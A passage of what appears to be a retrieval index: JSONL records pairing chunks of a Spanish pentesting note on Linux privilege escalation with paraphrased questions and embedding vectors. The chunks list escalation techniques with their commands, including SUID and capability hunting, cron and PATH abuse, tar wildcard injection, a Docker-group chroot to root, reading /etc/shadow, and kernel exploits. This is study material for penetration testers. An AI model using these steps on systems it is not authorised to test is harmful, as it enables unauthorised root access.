-0.02799, 0.01048, 0.05727, 0.02231, 0.02908, 0.0826, -0.04082, -0.13653, -0.06602, 0.01726, -0.09831, 0.05234, -0.03586, -0.00744, -0.0236, 0.06677, 0.0027, 0.00056, -0.07488, 0.05852, 0.00524, 0.06405, -0.00106, 0.04421, 0.01311, 0.01706, 0.01415, -0.00668, 0.00855, 0.02473, 0.01115, -0.05859, 0.05976, 0.00418, 0.01578, -0.07368, -0.02929, 0.00742, -0.01352, 0.0863, -0.02601, -0.01034, 0.03342, 0.02117, -0.13775, -0.06459, -0.07025, 0.08665, 0.0806, -0.01054, -0.04577, 0.01522, -0.05047, 0.06077, -0.01923, -0.01633, 0.02945, -0.1685, 0.06676, -0.07491, 0.01823, -0.00969, -0.04459, -0.0114, 0.0092, 0.02092, -0.05477, -0.00667, -0.02367, 0.05831, -0.02192, 0.06263, -0.00232, -0.08024, -0.05253, -0.00355, -0.02502, -0.02793, 0.00837, 0.00953, -0.07224, 0.0087, 0.04329, 0.02811, 0.0853, -0.0084, 0.03393, -0.01823, 0.03122, 0.01893, -0.04992, -0.05325, 0.07716, -0.04806, -0.01574, -0.01915, -0.02664, 0.01649, -0.01883, -0.0003, 0.02802, 0.06458, -0.04581, 0.05339, -0.05015, -0.05482, -0.00213, 0.04545, 0.03707, -0.08447, -0.00204, 0.01399, -0.05201, 0.01157, 0.01728, -0.00928, -0.04983, 0.04338, -0.02586, 0.03847, 0.04168, -0.03266, 0.04552, -0.03092, 0.03815, 0.10451, 0.01762, 0.04129, -0.01861, 0.02745, 0.03374, -0.00283, 0.03444, 0.00421, -0.0165, 0.00476, -0.00396, -0.02432, 0.02008, 0.04449, -0.01987, -0.05036, -0.02232, 0.00653, 0.00228, 0.05506, -0.01897, -0.01672, -0.03964, -0.01961, 0.04231, -0.05011, 0.04433, 0.09565, 0.01025, -0.03768, -0.03936, -0.00524, -0.0525, -0.0026, -0.02401, 0.02101, -0.04574, 0.00566, -0.0609, -0.02176, -0.04178, 0.00259]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "que comando me sirve para ver permisos especiales como SUID o Capabilities en todo el sistema?", "v": [-0.08828, 0.05481, -0.16176, -0.05976, -0.02937, -0.20893, 0.01194, -0.08743, -0.10129, -0.04295, -0.06473, -0.07572, 0.06512, -0.11943, 0.03196, 0.06454, 0.10541, -0.05001, 0.04113, -0.00644, 0.17118, 0.00762, 0.04548, -0.01565, -0.02232, 0.1065, 0.17282, -0.05188, -0.20616, -0.09669, -0.01157, 0.12244, 0.07133, -0.13858, -0.08592, 0.0442, -0.04661, 0.10877, -0.12994, 0.08615, -0.01347, 0.06417, -0.14343, 0.01761, 0.0999, -0.10814, -0.0132, 0.05103, 0.04214, 0.05671, -0.07461, -0.04425, -0.17755, -0.07264, -0.02323, -0.06821, 0.04954, -0.0457, -0.04516, 0.08065, -0.08055, -0.06308, 0.08886, 0.03841, 0.07979, -0.01147, -0.0166, -0.0169, -0.00189, 0.05125, -0.11906, 0.03372, 0.04843, 0.07922, 0.04098, -0.01041, -0.046, -0.0246, 0.12539, -0.03033, 0.05299, 0.12667, -0.14733, 0.02339, 0.01494, -0.08678, -0.04107, -0.04129, -0.02566, 0.00106, 0.0659, -0.02594, 0.09307, 0.02328, 0.08379, 0.01602, -0.00066, 0.14995, -0.00028, 0.03159, 0.03873, -0.01345, -0.02209, 0.10423, -0.05874, 0.04168, 0.10518, -0.06698, 0.04608, 0.03579, -0.01377, -0.00669, 0.0225, 0.05159, -0.01957, 0.00665, -0.02999, -0.09924, -0.00887, -0.04788, -0.09492, -0.03757, 0.07744, -0.0306, 0.067, -0.04829, -0.11433, 0.10598, 0.05529, 0.04674, -0.07219, 0.02866, 0.03729, -0.05458, -0.02038, 0.06106, 0.01634, 0.05276, -0.10561, -0.02374, -0.01987, 0.05649, 0.06029, 0.01133, 0.02172, 0.01335, 0.11493, -0.07612, -0.01946, -0.05333, 0.00997, 0.05184, -0.02197, 0.01164, -0.04461, 0.05915, -0.01462, -0.06982, -0.00215, 0.04723, -0.03185, 0.00993, -0.04773, 0.08122, 0.02539, -0.00541, -0.06343, -0.01978, 0.00679, 0.04826, -0.04566, 0.00475, 0.0361, -0.04884, 0.07116, -0.07996, 0.02243, -0.05092, 0.008, -0.01139, -0.05526, 0.02066, 0.006, -0.01928, -0.00671, -0.0346, -0.05422, -0.01709, 0.02827, 0.0348, 0.02182, 0.07687, 0.01655, -0.03648, -0.01609, 0.00453, -0.03776, -0.03193, -0.02765, -0.02379, -0.06172, 0.05284, -0.00939, -0.07855, 0.03237, -0.01287, 0.04638, 0.08413, 0.02237, 0.02532, -0.0305, -0.01533, 0.04372, -0.01232, -0.08953, 0.00668, 0.03538, 0.01196, -0.02447, -0.05844, 0.07855, 0.0286, 0.0428, 0.0743, 0.02561, -0.01011, 0.00584, -0.0112, 0.02294, 0.03564, -0.01252, -0.03502, 0.00013, -0.00547, 0.01142, -0.045, -0.03426, 0.02212, -0.00497, -0.04762, 0.02826, 0.0748, 0.01038, -0.05372, -0.04077, -0.06565, -0.07105, 0.00763, -0.02018, -0.0631, -0.01117, 0.05842, -0.01316, -0.04114, -0.00021, -0.03724]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "cΓ³mo puedo encontrar scripts crΓ³nicos o planificadores ejecutables que yo pueda editar?", "v": [-0.00543, 0.0923, -0.10296, 0.00243, 0.19163, -0.21172, 0.09084, 0.03778, -0.11371, -0.17796, -0.18525, -0.01534, 0.07917, -0.1585, 0.05821, 0.00948, 0.02251, -0.0257, -0.01451, -0.02301, -0.03675, -0.11534, -0.04155, 0.03661, -0.06162, -0.02564, -0.02898, 0.10566, -0.19407, -0.03472, -0.04831, 0.12893, 0.09843, -0.0929, 0.0342, 0.05612, -0.10304, 0.07293, -0.00826, 0.11422, -0.11012, 0.01933, -0.11737, 0.01919, 0.05164, -0.04585, 0.03639, -0.05719, -0.09824, -0.04151, 0.03437, 0.00121, -0.18341, -0.03404, 0.01963, -0.0253, 0.12031, -0.17355, -0.01717, 0.0115, 0.07221, -0.06601, 0.05405, -0.00791, 0.06091, 0.10264, 0.05118, -0.03706, -0.00056, 0.0145, -0.05213, 0.0707, 0.00481, 0.04092, 0.07221, -0.01123, -0.0327, -0.01868, 0.03238, -0.01601, -0.04551, -0.12997, -0.0868, 0.02354, -0.0506, -0.08365, -0.13649, 0.01198, -0.03188, -0.02871, 0.10405, -0.04387, -0.02241, 0.027, 0.02592, -0.00328, 0.08381, -0.01579, 0.07469, 0.06338, -0.02695, -0.02951, -0.1111, 0.1406, -0.00731, 0.1237, 0.08308, 0.10712, 0.01575, -0.06931, 0.04089, 0.08885, -0.00842, -0.02544, -0.0352, -0.08376, -0.05439, -0.02854, 0.12013, -0.02451, -0.07588, 0.04052, -0.08779, -0.01337, 0.0076, -0.00425, 0.00847, 0.00967, -0.01074, -0.01192, -0.07936, -0.01106, -0.03662, -0.07026, -0.07689, 0.1284, 0.0393, 2e-05, -0.01616, -0.07658, 0.04696, -0.00747, 0.0584, 0.00395, 0.02464, -0.03542, -0.03221, -0.07868, -0.01939, 0.00646, 0.09013, 0.0525, -0.02512, 0.01482, 0.00882, -0.06968, -0.00377, -0.01615, -0.00225, 0.07743, 0.00488, 0.03179, -0.05653, -0.01752, 0.07205, -0.0522, -0.06694, 0.00269, 0.04041, 0.07039, 0.02233, 0.04793, 0.0545, -0.09124, 0.01744, -0.10208, -0.01729, -0.03265, -0.01373, 0.00817, -0.02122, 0.0111, -0.02639, 0.01765, -0.00172, -0.03227, 0.05583, -0.02251, -0.01397, 0.04327, 0.04027, 0.01611, -0.01328, -0.03288, -0.03819, -0.0282, -0.03224, -0.00545, -0.05614, -0.01163, -0.04553, 0.0184, 0.06568, -0.03555, 0.08359, 0.04924, -0.02476, 0.03383, -0.07299, 0.05136, 0.01278, -0.02654, 0.04019, -0.07687, -0.05754, -0.04543, 0.01633, -0.03018, 0.04467, -0.01104, 0.01132, 0.00299, 0.06738, -0.05046, 0.0266, -0.04471, 0.02738, 0.01613, -0.00678, 0.07564, -0.01099, 0.0219, 0.01908, -0.02703, 0.04808, -0.0376, 0.01212, -0.00716, -0.00413, -0.03562, 0.02074, 0.05146, -0.01113, -0.02431, -0.01589, -0.05105, -0.06381, -0.0033, 0.03406, -0.02116, 0.02576, 0.01807, 0.06948, -0.04344, -0.01309, -0.02803]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. sudo -l β†’ SIEMPRE primero, sin password\n2. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null β†’ GTFOBins y LOLBAS\n3. Capabilities β†’ getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection β†’ tar czf /backup/* con --checkpoint\n6. PATH abuse β†’ script SUID llama \"ps\" sin ruta β†’ creas ./ps malicioso\n7. NFS no_root_squash β†’ showmount -e ; montas y subes un SUID\n8. Docker group β†’ docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits β†’ ΓΊltimo recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles β†’ /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "indexar": "cual es la mejor manera de detectar archivos sensibles que no deberΓ­an estar legibles por todos?", "v": [-0.06421, 0.04164, -0.15984, 0.01746, -0.01351, -0.15002, -0.09422, 0.01577, -0.05345, -0.10089, -0.02706, 0.00681, -0.10005, 0.02132, 0.16825, -0.00885, 0.03172, -0.00975, 0.08418, -0.1758, -0.00501, -0.07722, -0.04245, -0.0736, -0.02255, -0.12654, -0.03823, 0.0655, -0.06183, 0.05163, -0.09988, -0.08348, 0.04772, -0.02414, -0.03653, 0.10912, -0.05896, 0.09809, -0.07411, 0.17415, 0.05368, 0.10442, -0.08658, 0.06213, 0.02164, -0.07451, -0.09716, -0.00651, 0.03456, -0.06488, -0.01439, 0.10106, 0.03346, -0.00786, -0.0424, 0.00208, -0.03475, 0.03656, 0.16774, -0.05954, -0.13754, 0.1322, -0.01707, -0.03076, -0.06784, -0.00737, 0.06393, -0.0167, -0.09555, -0.0412, -0.04494, -0.01425, 0.03595, 0.06933, 0.00624, 0.10782, 0.07957, -0.03752, 0.08128, 0.00046, 0.16248, 0.0123, 0.04295, 0.01877, 0.00047, -0.09548, -0.00029, 0.00746, -0.00761, -0.01434, 0.03314, 0.00425, -0.04836, -0.02028, 0.02582, -0.01224, 0.13697, -0.02181, 0.02581, 0.06139, -0.0141, -0.11383, -0.02631, 0.1255, 0.08461, 0.05477, -0.05052, 0.0594, 0.03506, -0.18275, 0.00851, -0.01198, -0.02747, 0.06652, -0.0303, 0.04315, -0.0436, -0.03516, -0.07048, 0.02844, -0.05517, -0.0431, -0.04884, -0.0654, 0.11438, -0.00427, 0.02638, 0.01876, -0.03679, 0.06623, -0.04832, 0.01042, -0.05407, -0.02676, -0.09063, 0.03515, 0.06066, -0.01759, -0.07618, 0.0406, 0.05008, 0.06419, -0.00212, 0.02649, 0.08505, 0.04441, -0.05717, 0.04365, -0.04523, -0.01406, -0.02159, 0.04137, 0.07988, -0.06235, -0.00338, 0.04064, 0.03464, -0.13042, -0.08958, 0.01548, -0.07535, 0.02018, -0.02192, -0.0362, 0.04371, -0.10014, 0.00653, 0.12493, 0.05821, -0.03771, 0.06591, -0.01013, -0.0415, 0.00038, 4e-05, -0.01878, -0.03541, -0.04982, 0.20295, -0.06875, 0.03766, -0.02913, 0.04268, -0.0513, 0.01831, 0.00257, 0.05854, -0.01191, 0.02139, 0.04817, 0.08736, -0.07481, -0.00741, 0.04157, 0.02966, -0.03993, 0.02457, -0.06941, 0.04026, 0.02262, -0.07152, -0.06202, -0.043, 0.05227, -0.01254, 0.01452, -0.02527, -0.04421, 0.04628, -0.02048, 0.01754, 0.00287, 0.03811, -0.03168, -0.06251, 0.0047, 0.01251, 0.03759, 0.05196, 0.03238, 0.07976, -0.02312, 0.04386, -0.02144, -0.04507, -0.01504, -0.05863, -0.00117, 0.05981, -0.05849, 0.0065, 0.0172, 0.00474, 0.02406, -0.04105, -0.028, 0.02658, -0.07399, 0.01295, -0.08269, 0.023, 0.09029, 0.01053, -0.03449, 0.00426, -0.02829, -0.04107, -0.00043, 0.00566, -0.05343, 0.02494, 0.05103, 0.08513, -0.02358, 0.13143, 0.00049]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Orden recomendado\n`sudo -l` β†’ SUID/caps + GTFOBins y LOLBAS β†’ cron β†’ resto. **Kernel exploit = ΓΊltimo recurso** (inestable) β†’ Exploits conocidos.", "indexar": "quΓ© programa sirve para revisar permisos de root en mi sistema?", "v": [0.0001, 0.02759, -0.15641, -0.21611, 0.13941, -0.1279, -0.04464, -0.14216, -0.07323, -0.13321, -0.05415, -0.0813, 0.18478, -0.13279, 0.14253, -0.07748, -0.01114, 0.03065, 0.01161, 0.0286, -0.00814, -0.13474, -0.05254, 0.00777, -0.06933, 0.12313, 0.14098, 0.00386, -0.07542, 0.00437, 0.01894, -0.00343, 0.13353, -0.08047, -0.11649, 0.02891, 0.11363, 0.06827, 0.02848, -0.00525, 0.05915, 0.01849, -0.056, 0.08234, 0.01926, -0.14216, 0.0312, -0.01463, -0.03544, -0.0784, -0.03799, -0.049, -0.04582, -0.0525, 0.0731, -0.05984, -0.00871, -0.17768, -0.09009, 0.06236, -0.0726, -0.0502, 0.06403, -0.07458, 0.03761, -0.03725, 0.07529, -0.01842, -0.04673, 0.11695, -0.07668, 0.06892, 0.09496, -0.01352, -0.04891, -0.02797, -0.02119, -0.07548, 0.06615, -0.06454, 0.0717, 0.05537, -0.10132, 0.03974, -0.01449, -0.02328, -0.07802, -0.03074, -0.04746, 0.00018, -0.03848, 0.03309, 0.01433, 0.06879, 0.09476, -0.01971, 0.07007, 0.03787, -0.09125, 0.08672, 0.1016, -0.04357, -0.01589, 0.15023, -0.08855, 0.01438, 0.07662, -0.02608, -0.03633, 0.04341, -0.01818, 0.0245, -0.04271, -0.01465, -0.03607, -0.00877, -0.08535, -0.02139, -0.01769, -0.03021, -0.03448, 0.05328, -0.03949, -0.01171, 0.08577, 0.00359, -0.03532, 0.15708, -0.00262, 0.08009, 0.03993, -0.06694, 0.02203, 0.0379, -0.06436, -0.07261, -0.02017, 0.00747, -0.06259, 0.00468, -0.05154, 0.06884, 0.07028, 0.02418, 0.05813, 0.00467, 0.02828, -0.03481, -0.01573, -0.09074, -0.04556, -0.00483, -0.00927, 0.03813, -0.07119, -0.04473, -0.02342, -0.0503, -0.04801, 0.04174, -0.01283, -0.05657, -0.06135, 0.01813, 0.04373, -0.00815, 0.01299, 0.0018, 0.08704, 0.08567, -0.04667, 0.0489, 0.01913, -0.07604, 0.03529, 0.00426, 0.01575, -0.12847, 0.00917, 0.03665, -0.07016, 0.05151, 0.06557, -0.02033, -0.00422, 0.01827, -0.04216, 0.06214, 0.06879, -0.00732, 0.03886, 0.05856, 0.02552, -0.01303, 0.0564, 0.04126, -0.02891, -0.01511, -0.01783, -0.03019, -0.02947, 0.05043, 0.0043, -0.05541, 0.06693, -0.01056, 0.07785, -0.02711, 0.03648, 0.08381, -0.05142, 0.01142, 0.09459, 0.04119, -0.03535, 0.00573, -0.05268, 0.08264, 0.07904, -0.02139, 0.04182, -0.00856, 0.02729, 0.07061, -0.00125, -0.08061, 0.04058, -0.045, 0.01183, 0.0173, 0.00302, -0.06903, -0.01398, -0.00231, 0.01147, -0.08091, -0.02415, -0.00139, 0.01016, -0.05015, -0.00165, 0.06283, 0.01734, -0.06623, -0.00477, -0.00016, -0.02254, -0.03524, -0.01728, -0.02844, -0.01452, 0.06368, 0.01254, -0.06376, 0.02764, 0.01583]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Orden recomendado\n`sudo -l` β†’ SUID/caps + GTFOBins y LOLBAS β†’ cron β†’ resto. **Kernel exploit = ΓΊltimo recurso** (inestable) β†’ Exploits conocidos.", "indexar": "con quΓ© puedo verificar si mis procesos tienen privilegios especiales deseados?", "v": [0.04093, 0.18049, -0.22944, 0.05, 0.07797, 0.03768, 0.14881, -0.10252, -0.11519, -0.16661, 0.06114, 0.1229, -0.11026, -0.08347, 0.09352, 0.07101, 0.13632, 0.02641, 0.1136, 0.06723, 0.12034, -0.23552, -0.09692, -0.13503, -0.02096, 0.05648, -0.02069, -0.0154, -0.11365, 0.04127, -0.00489, 0.06194, -0.00333, -0.04336, -0.02528, 0.06056, -0.04486, 0.18551, -0.0436, 0.01872, 0.03537, 0.07975, -0.02076, -0.01123, 0.0652, -0.13095, -0.13971, 0.05706, -0.06857, -0.08346, 0.12585, 0.02212, -0.10526, -0.00628, -0.00773, -0.03435, -0.02988, 0.00778, 0.06937, 0.01863, -0.0791, -0.02975, 0.09161, 0.06172, -0.00181, -0.00848, 0.05086, -0.02772, 0.05482, 0.0451, -0.12622, -0.00922, 0.02644, -0.01595, -0.02236, -0.02143, -0.01317, -0.01827, 0.07036, 0.01708, 0.03046, 0.12822, -0.02256, 0.00057, -0.06139, -0.08301, -0.04159, 0.05363, 0.02054, -0.04615, 0.04006, 0.08398, 0.01817, -0.03263, -0.00924, 0.02394, 0.02471, 0.06882, -0.02042, 0.14414, 0.05825, 0.00235, -0.03688, 0.16198, -0.02201, 0.00679, -0.01387, -0.05762, 0.02045, -0.07744, -0.06348, -0.00489, -0.06658, -0.00896, 0.00343, 0.06379, -0.0789, -0.07988, -0.02163, -0.062, -0.06848, -0.02717, 0.00414, -0.02737, 0.08297, -0.11707, 0.00322, 0.09347, -0.01678, 0.08364, -0.04206, 0.01129, -0.075, -0.03019, -0.0352, -0.0458, -0.02928, -0.01581, 0.01455, -0.03752, 0.04456, -0.04432, 0.00118, 0.00912, 0.10495, 0.06076, -0.06112, -0.01195, -0.07498, -0.10951, -0.01807, -0.0712, 0.03036, 0.03609, -0.06231, -0.05411, -0.04004, -0.06921, 0.02958, 0.05188, 0.01171, -0.01848, -0.06548, -0.0152, 0.05704, 0.01479, -0.02515, -0.02732, 0.02773, -0.04924, -0.0119, -0.04429, -0.06141, -0.06225, -0.04737, 0.00584, -0.02996, -0.01258, 0.02894, -0.02053, -0.07609, 0.05705, 0.04116, 0.02802, -0.03966, -0.03101, -0.01718, -0.02423, 0.09063, 0.07964, 0.07667, 0.04399, 0.02657, -0.02183, 0.01785, 0.00499, -0.03853, -0.02579, -0.03291, -0.04883, -0.03989, -0.00513, 0.02196, -0.04796, 0.0074, 0.00475, -0.00376, -0.01409, -0.04694, 0.05443, 0.02185, -0.02391, 0.06036, -0.01885, -0.05108, 0.01513, 0.00665, -0.00899, -0.03022, -0.01954, 0.04373, -0.00246, 0.07483, 0.05008, 0.0462, 0.01898, 0.0164, 0.04882, 0.02413, 0.07466, -0.00084, 0.02981, -0.02944, -0.02549, 0.03973, 0.02196, 0.02529, -0.04973, -0.01419, -0.02446, 0.06668, 0.08122, 0.01886, -0.0602, 0.02009, -0.00035, -0.10675, -0.02344, -0.00125, -0.04455, 0.0531, 0.00863, 0.02406, -0.06954, 0.0225, -0.02569]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "quΓ© programa puedo usar para enumerar usuarios y privilegios en Linux", "v": [-0.08063, 0.08216, -0.1327, -0.19269, 0.02492, -0.0936, -0.10461, -0.04883, -0.17588, -0.07966, -0.01549, -0.06549, 0.01616, -0.07811, -0.03622, -0.12538, -0.02652, -0.10946, 0.0339, -0.03654, -0.06499, 0.05607, -0.17336, -0.02795, 0.00602, 0.04086, 0.08277, -0.16181, 0.08494, 0.10322, -0.05709, 0.03146, 0.02232, -0.04554, -0.02179, 0.07996, 0.07744, 0.04542, 0.11909, 0.15584, 0.17129, 0.01364, -0.03246, -0.00148, -0.0028, -0.10253, 0.00908, -0.04626, 0.0242, -0.15365, 0.07975, -0.03, -0.06367, -0.06535, 0.10172, -0.04066, 0.04434, -0.14163, 0.00735, 0.05379, -0.12265, -0.01051, 0.02096, 0.01105, -0.00214, -0.01371, 0.01097, -0.02275, -0.11152, 0.08567, -0.00586, 0.07808, 0.012, -0.02867, 0.03831, 0.05757, -0.12129, -0.02453, 0.03073, -0.03314, -0.02008, -0.01625, 0.04584, 0.0481, -0.11737, -0.11413, 0.06486, 0.05605, -0.03573, 0.05784, 0.06957, 0.0951, 0.04759, 0.01911, 0.14782, -0.03158, 0.1016, 0.11372, 0.04565, -0.01811, 0.0465, 0.00232, -0.08676, 0.19526, 0.00451, 0.01935, 0.05552, -0.09557, -0.03946, -0.07835, 0.01693, -0.06825, -0.01307, -0.0117, -0.09071, 0.03315, -0.05177, -0.02775, 0.0079, -0.08112, -0.02757, 0.01004, -0.0106, -0.03796, 0.13226, -0.02103, -0.01426, 0.16873, -0.10167, -0.04319, 0.02074, -0.08559, 0.00169, 0.01238, -0.07265, -0.00832, 0.01511, -0.06399, -0.01152, 0.01371, 0.02929, 0.04182, -0.0557, 0.02848, 0.09522, -0.04126, 0.00295, -0.06437, -0.04729, -0.08375, 0.00052, -0.03902, -0.03766, -0.01124, -0.09819, -0.06108, 0.03056, 0.01254, -0.08162, -0.03756, -0.04932, -0.0643, 0.00454, -0.01809, 0.0479, -0.03864, 0.03912, 0.01896, -0.00061, 0.041, 0.05016, 0.0996, 0.01984, -0.0564, 0.00466, -0.0717, 0.03611, 0.00282, -0.02368, 0.03092, -0.0523, 0.01895, 0.06867, -0.00088, -0.00713, 0.00135, -0.05204, 0.06997, 0.02252, 0.02681, -0.0322, 0.07708, 0.05661, -0.03091, -0.01397, 0.01193, -0.01084, 0.02436, -0.0196, -0.03666, -0.05789, 0.03244, 0.00927, 0.00977, 0.04883, 0.00097, -0.01259, -0.02406, 0.04569, 0.04877, 0.00913, 0.00207, 0.03772, 0.027, 0.00679, -0.00921, 0.03173, 0.0623, 0.03774, -0.0373, -0.01355, -0.02606, 0.02093, 0.06254, 0.03538, -0.06711, -0.02202, -0.01422, -0.00356, 0.01303, 0.03179, -0.06514, 0.01034, -0.03045, -0.01545, -0.04679, -0.00153, 0.01957, 0.02916, -0.02464, -0.0619, 0.11012, 0.021, -0.0513, -0.03828, -0.02172, -0.0705, -0.02373, -0.04983, -0.01373, -0.00674, -0.00977, 0.03061, -0.0503, -0.03346, 0.08797]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "con quΓ© puedo monitorear procesos de forma discreta sin necesitar root", "v": [0.02746, 0.05445, -0.24606, -0.11788, 0.12485, 0.03379, 0.00783, 0.04384, -0.03579, -0.07021, -0.02402, 0.01199, 0.11675, -0.20373, 0.01719, -0.05603, 0.04404, -0.03187, -0.08904, 0.02071, -0.05527, -0.19649, -0.02744, 0.00964, 0.0226, 0.12359, 0.13827, 0.06934, 0.03786, 0.03523, -0.05325, 0.07324, 0.19043, -0.01652, -0.13303, -0.03546, -0.0502, -0.01254, -0.04502, 0.04823, -0.0997, 0.06517, 0.06136, 0.08055, 0.0492, -0.01764, -0.08543, -0.06107, -0.01527, -0.09469, -0.01819, -0.01505, -0.06526, 0.10107, 0.01663, -0.05061, 0.12269, -0.14096, 0.17753, -0.04932, -0.14624, 0.02431, 0.02063, 0.00775, 0.04112, -0.05223, 0.05761, -0.08675, -0.11346, 0.0227, -0.068, 0.06422, 0.03478, -0.03129, 0.13867, 0.02854, -0.08101, -0.06798, 0.10882, 0.01823, 0.06089, 0.09942, -0.01743, -0.01619, -0.1278, -0.036, -0.02963, 0.04885, -0.0511, -0.05477, 0.02756, 0.04964, -0.06926, 0.01763, 0.03687, 0.02908, 0.07054, 0.02836, -0.10239, 0.06823, 0.06283, 0.01515, -0.0595, 0.14073, 0.04358, -0.02027, 0.04858, -0.04207, 0.06357, -0.10975, -0.03642, 0.04366, -0.10781, 0.04551, -0.02271, -0.04794, -0.09802, -6e-05, -0.04675, -0.01588, 0.00197, -0.07466, -0.03723, -0.04112, 0.06682, -0.11301, -0.02176, 0.0681, 0.05004, 0.04215, -0.00732, -0.03229, -0.05311, -0.07648, -0.03195, -0.05555, -0.02506, -0.03288, 0.06024, -0.07739, -0.04384, 0.01021, 0.05066, -0.06737, 0.12617, 0.00842, 0.04556, -0.02637, -0.07591, -0.0773, 0.00884, 0.02429, 0.02995, 0.02201, -0.07991, -0.04043, -0.02823, 0.00481, 0.05634, 0.02719, -0.03105, -0.0615, -0.06668, 0.0577, -0.02728, -0.01822, -0.04594, 0.0379, 0.00096, 0.02396, -0.04638, 0.03029, -0.09154, -0.06204, -0.0143, -0.01191, -0.0544, -0.0974, -0.01285, 0.01951, 0.03604, 0.09095, -0.03807, 0.02084, -0.00953, 0.02292, -0.04139, 0.01418, 0.06816, 0.02955, 0.01441, 0.09468, 0.00017, -0.00695, 0.04617, 0.01651, -0.00893, -0.00945, -0.00953, -0.02347, -0.01637, -0.01361, 0.03078, -0.02037, 0.06601, -0.00197, -0.05388, 0.08162, -0.04354, 0.0647, -0.03514, 0.03973, 0.05927, -0.01473, -0.02327, 0.02748, -0.01607, 0.01375, 0.02037, 0.03186, 0.05332, 0.01686, 0.06601, -0.00634, 0.01718, -0.04142, 0.04823, 0.02564, 0.00226, 0.02337, -0.02802, 0.04448, -0.04204, 0.00314, -0.00232, -0.00725, -0.00616, -0.04436, -0.00375, 0.03031, 0.0304, 0.03054, 0.03762, -0.02063, 0.03269, -0.07378, -0.07953, 0.02432, 0.01332, -0.07505, -0.02139, 0.05144, 0.06418, -0.02971, 0.01581, -0.02225]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "cuΓ‘l es una alternativa libre a linux-exploit-suggester", "v": [0.01545, 0.0638, -0.11821, -0.01932, 0.02921, -0.12734, -0.17486, -0.0351, -0.18151, -0.05422, -0.00633, -0.21875, 0.03009, 0.09103, -0.01554, -0.15269, -0.07917, -0.08946, 0.09485, -0.08239, -0.1005, 0.10806, -0.1045, -0.09393, 0.06762, -0.0159, -0.02077, -0.07732, 0.03736, 0.03183, -0.10352, -0.00095, 0.02646, -0.00642, 0.00621, 